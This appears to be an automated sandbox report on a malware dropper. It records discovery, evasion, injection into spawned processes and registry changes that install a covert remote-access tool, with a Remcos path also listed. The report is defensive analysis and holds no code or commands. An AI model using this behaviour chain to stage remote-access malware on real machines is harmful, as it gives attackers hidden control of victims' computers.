System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString N/A N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\InternetId = [binary value omitted] C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Security = [hex-encoded XML security_settings blob omitted] C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\dllhost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Certificates = [binary value omitted] C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\dllhost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\prnfldr.dll,-8036 = "Printers" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3128 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3128 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3128 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3128 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 3128 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 4860 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 4860 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 5008 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 5008 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 5008 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 4244 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 4244 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 3540 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 3540 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 3128 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\l4.exe
